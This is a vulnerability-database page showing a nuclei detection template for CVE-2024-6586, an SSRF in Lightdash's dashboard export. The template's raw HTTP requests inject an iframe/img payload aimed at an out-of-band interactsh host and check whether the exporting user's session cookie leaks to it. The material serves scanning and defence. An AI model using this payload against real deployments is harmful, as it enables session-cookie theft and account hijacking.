Lucene search
K

Lightdash v0.1024.6 - Server-Side Request Forgery

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

Lightdash v0.1024.6 - Server-Side Request Forgery allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. The cookie could be stolen and used to hijack application user sessions

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-6586
31 Aug 202401:41
circl
CNNVD
Lightdash 安全漏洞
30 Aug 202400:00
cnnvd
CVE
CVE-2024-6586
30 Aug 202422:25
cve
Cvelist
CVE-2024-6586
30 Aug 202422:25
cvelist
NVD
CVE-2024-6586
30 Aug 202423:15
nvd
OSV
CVE-2024-6586
30 Aug 202423:15
osv
RedhatCVE
CVE-2024-6586
23 May 202508:01
redhatcve
Vulnrichment
CVE-2024-6586
30 Aug 202422:25
vulnrichment
id: CVE-2024-6586

info:
  name: Lightdash v0.1024.6 - Server-Side Request Forgery
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. When they are exported, dashboards containing HTML elements can trigger HTTP requests to an external domain that contain the exporting user’s session cookie. The cookie could be stolen by a threat actor and used to hijack application user sessions.
  impact: |
    Authenticated attackers can create dashboards with malicious HTML elements that trigger HTTP requests to external domains, exfiltrating session cookies of users who export the dashboard.
  remediation: |
    Update Lightdash to version 0.1024.7 or later to address the SSRF vulnerability in dashboard export functionality.
  reference:
    - https://github.com/google/security-research/security/advisories/GHSA-4h7x-6vxh-7hjf
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6586
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
    cvss-score: 7.3
    cve-id: CVE-2024-6586
    cwe-id: CWE-201
    epss-score: 0.01786
    epss-percentile: 0.75626
    cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:*
  metadata:
    max-request: 5
    verified: true
    shodan-query: title:"Lightdash"
    vendor: lightdash
    product: lightdash
  tags: cve,cve2024,lightdash,ssrf,oast,authenticated,vuln

flow: http(1) && http(2) && http(3) && http(4) && http(5)

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /api/v1/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"email":"{{username}}","password":"{{password}}"}

  - raw:
      - |
        GET /api/v1/org/projects HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: projectuuid
        part: body
        json:
          - '.results[0].projectUuid'
        internal: true

  - raw:
      - |
        POST /api/v1/projects/{{projectuuid}}/dashboards HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name":"Test","description":"Test","tiles":[]}

    extractors:
      - type: json
        name: dashuuid
        part: body
        json:
          - '.results.uuid'
        internal: true

  - raw:
      - |
        PATCH /api/v1/dashboards/{{dashuuid}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"tiles":[{"uuid":"00000000-0000-0000-0000-000000000000","x":0,"y":0,"h":9,"w":15,"type":"markdown","properties":{"title":"title","hideTitle":false,"content":"<iframe src=\"http://{{interactsh-url}}\">frame</iframe>\n\n<img src=\"http://{{interactsh-url}}\">img</img>\n"}}],"filters":{"dimensions":[],"metrics":[],"tableCalculations":[]},"name":"my dashboard"}

    matchers:
      - type: word
        part: body
        words:
          - '"status":"ok"'
        internal: true

  - raw:
      - |
        POST /api/v1/dashboards/{{dashuuid}}/export HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"queryFilters":"","gridWidth":1400}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http")'
          - 'contains(interactsh_request, "connect.sid=")'
          - 'contains(body, "status\":\"ok")'
        condition: and
# digest: 4b0a00483046022100ab9106fb14a670c25576b6e9e4e85d4808fc5c98d7208fbdb19435a4ac095c430221009e3f40e9cf3490a12e8f78fffc02d2c0294c8d1b4d46c54ae98e7b4af69a241f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.17.3
EPSS0.01786
SSVC
22